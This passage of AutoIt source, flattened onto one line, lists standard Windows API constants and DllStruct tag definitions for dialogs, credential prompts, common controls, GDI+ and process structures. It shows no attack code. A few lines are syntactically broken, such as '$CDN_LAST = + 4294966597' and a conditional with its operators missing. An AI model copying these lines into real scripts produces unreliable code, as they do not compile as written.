4294967294 GLOBAL CONST $CDN_SHAREVIOLATION = $CDN_FIRST + 4294967293 GLOBAL CONST $CDN_HELP = $CDN_FIRST + 4294967292 GLOBAL CONST $CDN_FILEOK = $CDN_FIRST + 4294967291 GLOBAL CONST $CDN_TYPECHANGE = $CDN_FIRST + 4294967290 GLOBAL CONST $CDN_INCLUDEITEM = $CDN_FIRST + 4294967289 GLOBAL CONST $CDN_LAST = + 4294966597 GLOBAL CONST $PSD_DEFAULTMINMARGINS = 0 GLOBAL CONST $PSD_DISABLEMARGINS = 16 GLOBAL CONST $PSD_DISABLEORIENTATION = 256 GLOBAL CONST $PSD_DISABLEPAGEPAINTING = 524288 GLOBAL CONST $PSD_DISABLEPAPER = 512 GLOBAL CONST $PSD_DISABLEPRINTER = 32 GLOBAL CONST $PSD_ENABLEPAGEPAINTHOOK = 262144 GLOBAL CONST $PSD_ENABLEPAGESETUPHOOK = 8192 GLOBAL CONST $PSD_ENABLEPAGESETUPTEMPLATE = 32768 GLOBAL CONST $PSD_ENABLEPAGESETUPTEMPLATEHANDLE = 131072 GLOBAL CONST $PSD_INHUNDREDTHSOFMILLIMETERS = 8 GLOBAL CONST $PSD_INTHOUSANDTHSOFINCHES = 4 GLOBAL CONST $PSD_MARGINS = 2 GLOBAL CONST $PSD_MINMARGINS = 1 GLOBAL CONST $PSD_NONETWORKBUTTON = 2097152 GLOBAL CONST $PSD_NOWARNING = 128 GLOBAL CONST $PSD_RETURNDEFAULT = 1024 GLOBAL CONST $PSD_SHOWHELP = 2048 GLOBAL CONST $WM_PSD_PAGESETUPDLG = $__DLG_WM_USER GLOBAL CONST $WM_PSD_FULLPAGERECT = $__DLG_WM_USER + 1 GLOBAL CONST $WM_PSD_MINMARGINRECT = $__DLG_WM_USER + 2 GLOBAL CONST $WM_PSD_MARGINRECT = $__DLG_WM_USER + 3 GLOBAL CONST $WM_PSD_GREEKTEXTRECT = $__DLG_WM_USER + 4 GLOBAL CONST $WM_PSD_ENVSTAMPRECT = $__DLG_WM_USER + 5 GLOBAL CONST $WM_PSD_YAFULLPAGERECT = $__DLG_WM_USER + 6 GLOBAL CONST $PD_ALLPAGES = 0 GLOBAL CONST $PD_COLLATE = 16 GLOBAL CONST $PD_CURRENTPAGE = 4194304 GLOBAL CONST $PD_DISABLEPRINTTOFILE = 524288 GLOBAL CONST $PD_ENABLEPRINTHOOK = 4096 GLOBAL CONST $PD_ENABLEPRINTTEMPLATE = 16384 GLOBAL CONST $PD_ENABLEPRINTTEMPLATEHANDLE = 65536 GLOBAL CONST $PD_ENABLESETUPHOOK = 8192 GLOBAL CONST $PD_ENABLESETUPTEMPLATE = 32768 GLOBAL CONST $PD_ENABLESETUPTEMPLATEHANDLE = 131072 GLOBAL CONST $PD_EXCLUSIONFLAGS = 16777216 GLOBAL CONST $PD_HIDEPRINTTOFILE = 1048576 GLOBAL CONST $PD_NOCURRENTPAGE = 8388608 
GLOBAL CONST $PD_NONETWORKBUTTON = 2097152 GLOBAL CONST $PD_NOPAGENUMS = 8 GLOBAL CONST $PD_NOSELECTION = 4 GLOBAL CONST $PD_NOWARNING = 128 GLOBAL CONST $PD_PAGENUMS = 2 GLOBAL CONST $PD_PRINTSETUP = 64 GLOBAL CONST $PD_PRINTTOFILE = 32 GLOBAL CONST $PD_RETURNDC = 256 GLOBAL CONST $PD_RETURNDEFAULT = 1024 GLOBAL CONST $PD_RETURNIC = 512 GLOBAL CONST $PD_SELECTION = 1 GLOBAL CONST $PD_SHOWHELP = 2048 GLOBAL CONST $PD_USEDEVMODECOPIES = 262144 GLOBAL CONST $PD_USEDEVMODECOPIESANDCOLLATE = $PD_USEDEVMODECOPIES GLOBAL CONST $PD_USELARGETEMPLATE = 268435456 GLOBAL CONST $PD_RESULT_APPLY = 2 GLOBAL CONST $PD_RESULT_CANCEL = 0 GLOBAL CONST $PD_RESULT_PRINT = 1 GLOBAL CONST $EWX_LOGOFF = 0 GLOBAL CONST $EWX_POWEROFF = 8 GLOBAL CONST $EWX_REBOOT = 2 GLOBAL CONST $EWX_SHUTDOWN = 1 GLOBAL CONST $EWX_FORCE = 4 GLOBAL CONST $EWX_FORCEIFHUNG = 16 GLOBAL CONST $OAIF_ALLOW_REGISTRATION = 1 GLOBAL CONST $OAIF_REGISTER_EXT = 2 GLOBAL CONST $OAIF_EXEC = 4 GLOBAL CONST $OAIF_FORCE_REGISTRATION = 8 GLOBAL CONST $OAIF_HIDE_REGISTRATION = 32 GLOBAL CONST $OAIF_URL_PROTOCOL = 64 GLOBAL CONST $CREDUI_FLAGS_ALWAYS_SHOW_UI = 128 GLOBAL CONST $CREDUI_FLAGS_COMPLETE_USERNAME = 2048 GLOBAL CONST $CREDUI_FLAGS_DO_NOT_PERSIST = 2 GLOBAL CONST $CREDUI_FLAGS_EXCLUDE_CERTIFICATES = 8 GLOBAL CONST $CREDUI_FLAGS_EXPECT_CONFIRMATION = 131072 GLOBAL CONST $CREDUI_FLAGS_GENERIC_CREDENTIALS = 262144 GLOBAL CONST $CREDUI_FLAGS_INCORRECT_PASSWORD = 1 GLOBAL CONST $CREDUI_FLAGS_KEEP_USERNAME = 1048576 GLOBAL CONST $CREDUI_FLAGS_PASSWORD_ONLY_OK = 512 GLOBAL CONST $CREDUI_FLAGS_PERSIST = 4096 GLOBAL CONST $CREDUI_FLAGS_REQUEST_ADMINISTRATOR = 4 GLOBAL CONST $CREDUI_FLAGS_REQUIRE_CERTIFICATE = 16 GLOBAL CONST $CREDUI_FLAGS_REQUIRE_SMARTCARD = 256 GLOBAL CONST $CREDUI_FLAGS_SERVER_CREDENTIAL = 16384 GLOBAL CONST $CREDUI_FLAGS_SHOW_SAVE_CHECK_BOX = 64 GLOBAL CONST $CREDUI_FLAGS_USERNAME_TARGET_CREDENTIALS = 524288 GLOBAL CONST $CREDUI_FLAGS_VALIDATE_USERNAME = 1024 GLOBAL CONST $CREDUIWIN_AUTHPACKAGE_ONLY = 16 
GLOBAL CONST $CREDUIWIN_CHECKBOX = 2 GLOBAL CONST $CREDUIWIN_ENUMERATE_ADMINS = 256 GLOBAL CONST $CREDUIWIN_ENUMERATE_CURRENT_USER = 512 GLOBAL CONST $CREDUIWIN_GENERIC = 1 GLOBAL CONST $CREDUIWIN_IN_CRED_ONLY = 32 GLOBAL CONST $CREDUIWIN_SECURE_PROMPT = 4096 GLOBAL CONST $CREDUIWIN_PACK_32_WOW = 268435456 GLOBAL CONST $CREDUIWIN_PREPROMPTING = 8192 GLOBAL CONST $STR_NOCASESENSE = 0 GLOBAL CONST $STR_CASESENSE = 1 GLOBAL CONST $STR_NOCASESENSEBASIC = 2 GLOBAL CONST $STR_STRIPLEADING = 1 GLOBAL CONST $STR_STRIPTRAILING = 2 GLOBAL CONST $STR_STRIPSPACES = 4 GLOBAL CONST $STR_STRIPALL = 8 GLOBAL CONST $STR_CHRSPLIT = 0 GLOBAL CONST $STR_ENTIRESPLIT = 1 GLOBAL CONST $STR_NOCOUNT = 2 GLOBAL CONST $STR_REGEXPMATCH = 0 GLOBAL CONST $STR_REGEXPARRAYMATCH = 1 GLOBAL CONST $STR_REGEXPARRAYFULLMATCH = 2 GLOBAL CONST $STR_REGEXPARRAYGLOBALMATCH = 3 GLOBAL CONST $STR_REGEXPARRAYGLOBALFULLMATCH = 4 GLOBAL CONST $STR_ENDISSTART = 0 GLOBAL CONST $STR_ENDNOTSTART = 1 GLOBAL CONST $SB_ANSI = 1 GLOBAL CONST $SB_UTF16LE = 2 GLOBAL CONST $SB_UTF16BE = 3 GLOBAL CONST $SB_UTF8 = 4 GLOBAL CONST $SE_UTF16 = 0 GLOBAL CONST $SE_ANSI = 1 GLOBAL CONST $SE_UTF8 = 2 GLOBAL CONST $STR_UTF16 = 0 GLOBAL CONST $STR_UCS2 = 1 GLOBAL CONST $TAGPOINT = "struct;long X;long Y;endstruct" GLOBAL CONST $TAGRECT = "struct;long Left;long Top;long Right;long Bottom;endstruct" GLOBAL CONST $TAGSIZE = "struct;long X;long Y;endstruct" GLOBAL CONST $TAGMARGINS = "int cxLeftWidth;int cxRightWidth;int cyTopHeight;int cyBottomHeight" GLOBAL CONST $TAGFILETIME = "struct;dword Lo;dword Hi;endstruct" GLOBAL CONST $TAGSYSTEMTIME = "struct;word Year;word Month;word Dow;word Day;word Hour;word Minute;word Second;word MSeconds;endstruct" GLOBAL CONST $TAGTIME_ZONE_INFORMATION = "struct;long Bias;wchar StdName[32];word StdDate[8];long StdBias;wchar DayName[32];word DayDate[8];long DayBias;endstruct" GLOBAL CONST $TAGNMHDR = "struct;hwnd hWndFrom;uint_ptr IDFrom;INT Code;endstruct" GLOBAL CONST $TAGCOMBOBOXEXITEM = "uint 
Mask;int_ptr Item;ptr Text;int TextMax;int Image;int SelectedImage;int OverlayImage;" & "int Indent;lparam Param" GLOBAL CONST $TAGNMCBEDRAGBEGIN = $TAGNMHDR & ";int ItemID;wchar szText[260]" GLOBAL CONST $TAGNMCBEENDEDIT = $TAGNMHDR & ";bool fChanged;int NewSelection;wchar szText[260];int Why" GLOBAL CONST $TAGNMCOMBOBOXEX = $TAGNMHDR & ";uint Mask;int_ptr Item;ptr Text;int TextMax;int Image;" & "int SelectedImage;int OverlayImage;int Indent;lparam Param" GLOBAL CONST $TAGDTPRANGE = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;" & "word MinSecond;word MinMSecond;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;" & "word MaxMinute;word MaxSecond;word MaxMSecond;bool MinValid;bool MaxValid" GLOBAL CONST $TAGNMDATETIMECHANGE = $TAGNMHDR & ";dword Flag;" & $TAGSYSTEMTIME GLOBAL CONST $TAGNMDATETIMEFORMAT = $TAGNMHDR & ";ptr Format;" & $TAGSYSTEMTIME & ";ptr pDisplay;wchar Display[64]" GLOBAL CONST $TAGNMDATETIMEFORMATQUERY = $TAGNMHDR & ";ptr Format;struct;long SizeX;long SizeY;endstruct" GLOBAL CONST $TAGNMDATETIMEKEYDOWN = $TAGNMHDR & ";int VirtKey;ptr Format;" & $TAGSYSTEMTIME GLOBAL CONST $TAGNMDATETIMESTRING = $TAGNMHDR & ";ptr UserString;" & $TAGSYSTEMTIME & ";dword Flags" GLOBAL CONST $TAGEVENTLOGRECORD = "dword Length;dword Reserved;dword RecordNumber;dword TimeGenerated;dword TimeWritten;dword EventID;" & "word EventType;word NumStrings;word EventCategory;word ReservedFlags;dword ClosingRecordNumber;dword StringOffset;" & "dword UserSidLength;dword UserSidOffset;dword DataLength;dword DataOffset" GLOBAL CONST $TAGGDIP_EFFECTPARAMS_BLUR = "float Radius; bool ExpandEdge" GLOBAL CONST $TAGGDIP_EFFECTPARAMS_BRIGHTNESSCONTRAST = "int BrightnessLevel; int ContrastLevel" GLOBAL CONST $TAGGDIP_EFFECTPARAMS_COLORBALANCE = "int CyanRed; int MagentaGreen; int YellowBlue" GLOBAL CONST $TAGGDIP_EFFECTPARAMS_COLORCURVE = "int Adjustment; int Channel; int AdjustValue" GLOBAL CONST $TAGGDIP_EFFECTPARAMS_COLORLUT = "byte 
LutB[256]; byte LutG[256]; byte LutR[256]; byte LutA[256]" GLOBAL CONST $TAGGDIP_EFFECTPARAMS_HUESATURATIONLIGHTNESS = "int HueLevel; int SaturationLevel; int LightnessLevel" GLOBAL CONST $TAGGDIP_EFFECTPARAMS_LEVELS = "int Highlight; int Midtone; int Shadow" GLOBAL CONST $TAGGDIP_EFFECTPARAMS_REDEYECORRECTION = "uint NumberOfAreas; ptr Areas" GLOBAL CONST $TAGGDIP_EFFECTPARAMS_SHARPEN = "float Radius; float Amount" GLOBAL CONST $TAGGDIP_EFFECTPARAMS_TINT = "int Hue; int Amount" GLOBAL CONST $TAGGDIPBITMAPDATA = "uint Width;uint Height;int Stride;int Format;ptr Scan0;uint_ptr Reserved" GLOBAL CONST $TAGGDIPCOLORMATRIX = "float m[25]" GLOBAL CONST $TAGGDIPENCODERPARAM = "struct;byte GUID[16];ulong NumberOfValues;ulong Type;ptr Values;endstruct" GLOBAL CONST $TAGGDIPENCODERPARAMS = "uint Count;" & $TAGGDIPENCODERPARAM GLOBAL CONST $TAGGDIPRECTF = "struct;float X;float Y;float Width;float Height;endstruct" GLOBAL CONST $TAGGDIPSTARTUPINPUT = "uint Version;ptr Callback;bool NoThread;bool NoCodecs" GLOBAL CONST $TAGGDIPSTARTUPOUTPUT = "ptr HookProc;ptr UnhookProc" GLOBAL CONST $TAGGDIPIMAGECODECINFO = "byte CLSID[16];byte FormatID[16];ptr CodecName;ptr DllName;ptr FormatDesc;ptr FileExt;" & "ptr MimeType;dword Flags;dword Version;dword SigCount;dword SigSize;ptr SigPattern;ptr SigMask" GLOBAL CONST $TAGGDIPPENCODERPARAMS = "uint Count;byte Params[1]" GLOBAL CONST $TAGHDITEM = "uint Mask;int XY;ptr Text;handle hBMP;int TextMax;int Fmt;lparam Param;int Image;int Order;uint Type;ptr pFilter;uint State" GLOBAL CONST $TAGNMHDDISPINFO = $TAGNMHDR & ";int Item;uint Mask;ptr Text;int TextMax;int Image;lparam lParam" GLOBAL CONST $TAGNMHDFILTERBTNCLICK = $TAGNMHDR & ";int Item;" & $TAGRECT GLOBAL CONST $TAGNMHEADER = $TAGNMHDR & ";int Item;int Button;ptr pItem" GLOBAL CONST $TAGGETIPADDRESS = "byte Field4;byte Field3;byte Field2;byte Field1" GLOBAL CONST $TAGNMIPADDRESS = $TAGNMHDR & ";int Field;int Value" GLOBAL CONST $TAGLVFINDINFO = "struct;uint Flags;ptr Text;lparam Param;" 
& $TAGPOINT & ";uint Direction;endstruct" GLOBAL CONST $TAGLVHITTESTINFO = $TAGPOINT & ";uint Flags;int Item;int SubItem;int iGroup" GLOBAL CONST $TAGLVITEM = "struct;uint Mask;int Item;int SubItem;uint State;uint StateMask;ptr Text;int TextMax;int Image;lparam Param;" & "int Indent;int GroupID;uint Columns;ptr pColumns;ptr piColFmt;int iGroup;endstruct" GLOBAL CONST $TAGNMLISTVIEW = $TAGNMHDR & ";int Item;int SubItem;uint NewState;uint OldState;uint Changed;" & "struct;long ActionX;long ActionY;endstruct;lparam Param" GLOBAL CONST $TAGNMLVCUSTOMDRAW = "struct;" & $TAGNMHDR & ";dword dwDrawStage;handle hdc;" & $TAGRECT & ";dword_ptr dwItemSpec;uint uItemState;lparam lItemlParam;endstruct" & ";dword clrText;dword clrTextBk;int iSubItem;dword dwItemType;dword clrFace;int iIconEffect;" & "int iIconPhase;int iPartID;int iStateID;struct;long TextLeft;long TextTop;long TextRight;long TextBottom;endstruct;uint uAlign" GLOBAL CONST $TAGNMLVDISPINFO = $TAGNMHDR & ";" & $TAGLVITEM GLOBAL CONST $TAGNMLVFINDITEM = $TAGNMHDR & ";int Start;" & $TAGLVFINDINFO GLOBAL CONST $TAGNMLVGETINFOTIP = $TAGNMHDR & ";dword Flags;ptr Text;int TextMax;int Item;int SubItem;lparam lParam" GLOBAL CONST $TAGNMITEMACTIVATE = $TAGNMHDR & ";int Index;int SubItem;uint NewState;uint OldState;uint Changed;" & $TAGPOINT & ";lparam lParam;uint KeyFlags" GLOBAL CONST $TAGNMLVKEYDOWN = "align 1;" & $TAGNMHDR & ";word VKey;uint Flags" GLOBAL CONST $TAGNMLVSCROLL = $TAGNMHDR & ";int DX;int DY" GLOBAL CONST $TAGMCHITTESTINFO = "uint Size;" & $TAGPOINT & ";uint Hit;" & $TAGSYSTEMTIME & ";" & $TAGRECT & ";int iOffset;int iRow;int iCol" GLOBAL CONST $TAGMCMONTHRANGE = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;word MinSecond;" & "word MinMSeconds;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;word MaxMinute;word MaxSecond;" & "word MaxMSeconds;short Span" GLOBAL CONST $TAGMCRANGE = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word 
MinMinute;word MinSecond;" & "word MinMSeconds;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;word MaxMinute;word MaxSecond;" & "word MaxMSeconds;short MinSet;short MaxSet" GLOBAL CONST $TAGMCSELRANGE = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;word MinSecond;" & "word MinMSeconds;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;word MaxMinute;word MaxSecond;" & "word MaxMSeconds" GLOBAL CONST $TAGNMDAYSTATE = $TAGNMHDR & ";" & $TAGSYSTEMTIME & ";int DayState;ptr pDayState" GLOBAL CONST $TAGNMSELCHANGE = $TAGNMHDR & ";struct;word BegYear;word BegMonth;word BegDOW;word BegDay;word BegHour;word BegMinute;word BegSecond;word BegMSeconds;endstruct;" & "struct;word EndYear;word EndMonth;word EndDOW;word EndDay;word EndHour;word EndMinute;word EndSecond;word EndMSeconds;endstruct" GLOBAL CONST $TAGNMOBJECTNOTIFY = $TAGNMHDR & ";int Item;ptr piid;ptr pObject;long Result;dword dwFlags" GLOBAL CONST $TAGNMTCKEYDOWN = "align 1;" & $TAGNMHDR & ";word VKey;uint Flags" GLOBAL CONST $TAGTVITEM = "struct;uint Mask;handle hItem;uint State;uint StateMask;ptr Text;int TextMax;int Image;int SelectedImage;" & "int Children;lparam Param;endstruct" GLOBAL CONST $TAGTVITEMEX = "struct;" & $TAGTVITEM & ";int Integral;uint uStateEx;hwnd hwnd;int iExpandedImage;int iReserved;endstruct" GLOBAL CONST $TAGNMTREEVIEW = $TAGNMHDR & ";uint Action;" & "struct;uint OldMask;handle OldhItem;uint OldState;uint OldStateMask;" & "ptr OldText;int OldTextMax;int OldImage;int OldSelectedImage;int OldChildren;lparam OldParam;endstruct;" & "struct;uint NewMask;handle NewhItem;uint NewState;uint NewStateMask;" & "ptr NewText;int NewTextMax;int NewImage;int NewSelectedImage;int NewChildren;lparam NewParam;endstruct;" & "struct;long PointX;long PointY;endstruct" GLOBAL CONST $TAGNMTVCUSTOMDRAW = "struct;" & $TAGNMHDR & ";dword DrawStage;handle HDC;" & $TAGRECT & ";dword_ptr ItemSpec;uint ItemState;lparam ItemParam;endstruct" & ";dword 
ClrText;dword ClrTextBk;int Level" GLOBAL CONST $TAGNMTVDISPINFO = $TAGNMHDR & ";" & $TAGTVITEM GLOBAL CONST $TAGNMTVGETINFOTIP = $TAGNMHDR & ";ptr Text;int TextMax;handle hItem;lparam lParam" GLOBAL CONST $TAGNMTVITEMCHANGE = $TAGNMHDR & ";uint Changed;handle hItem;uint StateNew;uint StateOld;lparam lParam;" GLOBAL CONST $TAGTVHITTESTINFO = $TAGPOINT & ";uint Flags;handle Item" GLOBAL CONST $TAGNMTVKEYDOWN = "align 1;" & $TAGNMHDR & ";word VKey;uint Flags" GLOBAL CONST $TAGNMMOUSE = $TAGNMHDR & ";dword_ptr ItemSpec;dword_ptr ItemData;" & $TAGPOINT & ";lparam HitInfo" GLOBAL CONST $TAGTOKEN_PRIVILEGES = "dword Count;align 4;int64 LUID;dword Attributes" GLOBAL CONST $TAGIMAGEINFO = "handle hBitmap;handle hMask;int Unused1;int Unused2;" & $TAGRECT GLOBAL CONST $TAGMENUINFO = "dword Size;INT Mask;dword Style;uint YMax;handle hBack;dword ContextHelpID;ulong_ptr MenuData" GLOBAL CONST $TAGMENUITEMINFO = "uint Size;uint Mask;uint Type;uint State;uint ID;handle SubMenu;handle BmpChecked;handle BmpUnchecked;" & "ulong_ptr ItemData;ptr TypeData;uint CCH;handle BmpItem" GLOBAL CONST $TAGREBARBANDINFO = "uint cbSize;uint fMask;uint fStyle;dword clrFore;dword clrBack;ptr lpText;uint cch;" & "int iImage;hwnd hwndChild;uint cxMinChild;uint cyMinChild;uint cx;handle hbmBack;uint wID;uint cyChild;uint cyMaxChild;" & "uint cyIntegral;uint cxIdeal;lparam lParam;uint cxHeader" & ((@OSVERSION = "WIN_XP" ) "" ";" & $TAGRECT & ";uint uChevronState" ) GLOBAL CONST $TAGNMREBARAUTOBREAK = $TAGNMHDR & ";uint uBand;uint wID;lparam lParam;uint uMsg;uint fStyleCurrent;bool fAutoBreak" GLOBAL CONST $TAGNMRBAUTOSIZE = $TAGNMHDR & ";bool fChanged;" & "struct;long TargetLeft;long TargetTop;long TargetRight;long TargetBottom;endstruct;" & "struct;long ActualLeft;long ActualTop;long ActualRight;long ActualBottom;endstruct" GLOBAL CONST $TAGNMREBAR = $TAGNMHDR & ";dword dwMask;uint uBand;uint fStyle;uint wID;lparam lParam" GLOBAL CONST $TAGNMREBARCHEVRON = $TAGNMHDR & ";uint uBand;uint wID;lparam 
lParam;" & $TAGRECT & ";lparam lParamNM" GLOBAL CONST $TAGNMREBARCHILDSIZE = $TAGNMHDR & ";uint uBand;uint wID;" & "struct;long CLeft;long CTop;long CRight;long CBottom;endstruct;" & "struct;long BLeft;long BTop;long BRight;long BBottom;endstruct" GLOBAL CONST $TAGCOLORSCHEME = "dword Size;dword BtnHighlight;dword BtnShadow" GLOBAL CONST $TAGNMTOOLBAR = $TAGNMHDR & ";int iItem;" & "struct;int iBitmap;int idCommand;byte fsState;byte fsStyle;dword_ptr dwData;int_ptr iString;endstruct" & ";int cchText;ptr pszText;" & $TAGRECT GLOBAL CONST $TAGNMTBHOTITEM = $TAGNMHDR & ";int idOld;int idNew;dword dwFlags" GLOBAL CONST $TAGTBBUTTON = "int Bitmap;int Command;byte State;byte Style;dword_ptr Param;int_ptr String" GLOBAL CONST $TAGTBBUTTONINFO = "uint Size;dword Mask;int Command;int Image;byte State;byte Style;word CX;dword_ptr Param;ptr Text;int TextMax" GLOBAL CONST $TAGNETRESOURCE = "dword Scope;dword Type;dword DisplayType;dword Usage;ptr LocalName;ptr RemoteName;ptr Comment;ptr Provider" GLOBAL CONST $TAGOVERLAPPED = "ulong_ptr Internal;ulong_ptr InternalHigh;struct;dword Offset;dword OffsetHigh;endstruct;handle hEvent" GLOBAL CONST $TAGOPENFILENAME = "dword StructSize;hwnd hwndOwner;handle hInstance;ptr lpstrFilter;ptr lpstrCustomFilter;" & "dword nMaxCustFilter;dword nFilterIndex;ptr lpstrFile;dword nMaxFile;ptr lpstrFileTitle;dword nMaxFileTitle;" & "ptr lpstrInitialDir;ptr lpstrTitle;dword Flags;word nFileOffset;word nFileExtension;ptr lpstrDefExt;lparam lCustData;" & "ptr lpfnHook;ptr lpTemplateName;ptr pvReserved;dword dwReserved;dword FlagsEx" GLOBAL CONST $TAGBITMAPINFOHEADER = "struct;dword biSize;long biWidth;long biHeight;word biPlanes;word biBitCount;" & "dword biCompression;dword biSizeImage;long biXPelsPerMeter;long biYPelsPerMeter;dword biClrUsed;dword biClrImportant;endstruct" GLOBAL CONST $TAGBITMAPINFO = $TAGBITMAPINFOHEADER & ";dword biRGBQuad[1]" GLOBAL CONST $TAGBLENDFUNCTION = "byte Op;byte Flags;byte Alpha;byte Format" GLOBAL CONST $TAGGUID = 
"struct;ulong Data1;ushort Data2;ushort Data3;byte Data4[8];endstruct" GLOBAL CONST $TAGWINDOWPLACEMENT = "uint length;uint flags;uint showCmd;long ptMinPosition[2];long ptMaxPosition[2];long rcNormalPosition[4]" GLOBAL CONST $TAGWINDOWPOS = "hwnd hWnd;hwnd InsertAfter;int X;int Y;int CX;int CY;uint Flags" GLOBAL CONST $TAGSCROLLINFO = "uint cbSize;uint fMask;int nMin;int nMax;uint nPage;int nPos;int nTrackPos" GLOBAL CONST $TAGSCROLLBARINFO = "dword cbSize;" & $TAGRECT & ";int dxyLineButton;int xyThumbTop;" & "int xyThumbBottom;int reserved;dword rgstate[6]" GLOBAL CONST $TAGLOGFONT = "struct;long Height;long Width;long Escapement;long Orientation;long Weight;byte Italic;byte Underline;" & "byte Strikeout;byte CharSet;byte OutPrecision;byte ClipPrecision;byte Quality;byte PitchAndFamily;wchar FaceName[32];endstruct" GLOBAL CONST $TAGKBDLLHOOKSTRUCT = "dword vkCode;dword scanCode;dword flags;dword time;ulong_ptr dwExtraInfo" GLOBAL CONST $TAGPROCESS_INFORMATION = "handle hProcess;handle hThread;dword ProcessID;dword ThreadID" GLOBAL CONST $TAGSTARTUPINFO = "dword Size;ptr Reserved1;ptr Desktop;ptr Title;dword X;dword Y;dword XSize;dword YSize;dword XCountChars;" & "dword YCountChars;dword FillAttribute;dword Flags;word ShowWindow;word Reserved2;ptr Reserved3;handle StdInput;" & "handle StdOutput;handle StdError" GLOBAL CONST $TAGSECURITY_ATTRIBUTES = "dword Length;ptr Descriptor;bool InheritHandle" GLOBAL CONST $TAGWIN32_FIND_DATA = "dword dwFileAttributes;dword ftCreationTime[2];dword ftLastAccessTime[2];dword ftLastWriteTime[2];dword nFileSizeHigh;dword nFileSizeLow;dword dwReserved0;dword dwReserved1;wchar cFileName[260];wchar cAlternateFileName[14]" GLOBAL CONST $TAGTEXTMETRIC = "long tmHeight;long tmAscent;long tmDescent;long tmInternalLeading;long tmExternalLeading;" & "long tmAveCharWidth;long tmMaxCharWidth;long tmWeight;long tmOverhang;long tmDigitizedAspectX;long tmDigitizedAspectY;" & "wchar tmFirstChar;wchar tmLastChar;wchar tmDefaultChar;wchar 
tmBreakChar;byte tmItalic;byte tmUnderlined;byte tmStruckOut;" & "byte tmPitchAndFamily;byte tmCharSet" GLOBAL CONST $COINIT_APARTMENTTHREADED = 2 GLOBAL CONST $COINIT_DISABLE_OLE1DDE = 4 GLOBAL CONST $COINIT_MULTITHREADED = 0 GLOBAL CONST $COINIT_SPEED_OVER_MEMORY = 8 GLOBAL CONST $OPT_COORDSRELATIVE = 0 GLOBAL CONST $OPT_COORDSABSOLUTE = 1 GLOBAL CONST $OPT_COORDSCLIENT = 2 GLOBAL CONST $OPT_ERRORSILENT = 0 GLOBAL CONST $OPT_ERRORFATAL = 1 GLOBAL CONST $OPT_CAPSNOSTORE = 0 GLOBAL CONST $OPT_CAPSSTORE = 1 GLOBAL CONST $OPT_MATCHSTART = 1 GLOBAL CONST $OPT_MATCHANY = 2 GLOBAL CONST $OPT_MATCHEXACT = 3 GLOBAL CONST $OPT_MATCHADVANCED = 4 GLOBAL CONST $CCS_TOP = 1 GLOBAL CONST $CCS_NOMOVEY = 2 GLOBAL CONST $CCS_BOTTOM = 3 GLOBAL CONST $CCS_NORESIZE = 4 GLOBAL CONST $CCS_NOPARENTALIGN = 8 GLOBAL CONST $CCS_NOHILITE = 16 GLOBAL CONST $CCS_ADJUSTABLE = 32 GLOBAL CONST $CCS_NODIVIDER = 64 GLOBAL CONST $CCS_VERT = 128 GLOBAL CONST $CCS_LEFT = 129 GLOBAL CONST $CCS_NOMOVEX = 130 GLOBAL CONST $CCS_RIGHT = 131 GLOBAL CONST $DT_DRIVETYPE = 1 GLOBAL CONST $DT_SSDSTATUS = 2 GLOBAL CONST $DT_BUSTYPE = 3 GLOBAL CONST $PROXY_IE = 0 GLOBAL CONST $PROXY_NONE = 1 GLOBAL CONST $PROXY_SPECIFIED = 2 GLOBAL CONST $OBJID_WINDOW = 0 GLOBAL CONST $OBJID_TITLEBAR = 4294967294 GLOBAL CONST $OBJID_SIZEGRIP = 4294967289 GLOBAL CONST $OBJID_CARET = 4294967288 GLOBAL CONST $OBJID_CURSOR = 4294967287 GLOBAL CONST $OBJID_ALERT = 4294967286 GLOBAL CONST $OBJID_SOUND = 4294967285 GLOBAL CONST $DLG_CENTERONTOP = 0 GLOBAL CONST $DLG_NOTITLE = 1 GLOBAL CONST $DLG_NOTONTOP = 2 GLOBAL CONST $DLG_TEXTLEFT = 4 GLOBAL CONST $DLG_TEXTRIGHT = 8 GLOBAL CONST $DLG_MOVEABLE = 16 GLOBAL CONST $DLG_TEXTVCENTER = 32 GLOBAL CONST $IDC_UNKNOWN = 0 GLOBAL CONST $IDC_APPSTARTING = 1 GLOBAL CONST $IDC_ARROW = 2 GLOBAL CONST $IDC_CROSS = 3 GLOBAL CONST $IDC_HAND = 32649 GLOBAL CONST $IDC_HELP = 4 GLOBAL CONST $IDC_IBEAM = 5 GLOBAL CONST $IDC_ICON = 6 GLOBAL CONST $IDC_NO = 7 GLOBAL CONST $IDC_SIZE = 8 GLOBAL CONST 
$IDC_SIZEALL = 9 GLOBAL CONST $IDC_SIZENESW = 10 GLOBAL CONST $IDC_SIZENS = 11 GLOBAL CONST $IDC_SIZENWSE = 12 GLOBAL CONST $IDC_SIZEWE = 13 GLOBAL CONST $IDC_UPARROW = 14 GLOBAL CONST $IDC_WAIT = 15 GLOBAL CONST $IDI_APPLICATION = 32512 GLOBAL CONST $IDI_ASTERISK = 32516 GLOBAL CONST $IDI_EXCLAMATION = 32515 GLOBAL CONST $IDI_HAND = 32513 GLOBAL CONST $IDI_QUESTION = 32514 GLOBAL CONST $IDI_WINLOGO = 32517 GLOBAL CONST $IDI_SHIELD = 32518 GLOBAL CONST $IDI_ERROR = $IDI_HAND GLOBAL CONST $IDI_INFORMATION = $IDI_ASTERISK GLOBAL CONST $IDI_WARNING = $IDI_EXCLAMATION GLOBAL CONST $SD_LOGOFF = 0 GLOBAL CONST $SD_SHUTDOWN = 1 GLOBAL CONST $SD_REBOOT = 2 GLOBAL CONST $SD_FORCE = 4 GLOBAL CONST $SD_POWERDOWN = 8 GLOBAL CONST $SD_FORCEHUNG = 16 GLOBAL CONST $SD_STANDBY = 32 GLOBAL CONST $SD_HIBERNATE = 64 GLOBAL CONST $STDIN_CHILD = 1 GLOBAL CONST $STDOUT_CHILD = 2 GLOBAL CONST $STDERR_CHILD = 4 GLOBAL CONST $STDERR_MERGED = 8 GLOBAL CONST $STDIO_INHERIT_PARENT = 16 GLOBAL CONST $RUN_CREATE_NEW_CONSOLE = 65536 GLOBAL CONST $UBOUND_DIMENSIONS = 0 GLOBAL CONST $UBOUND_ROWS 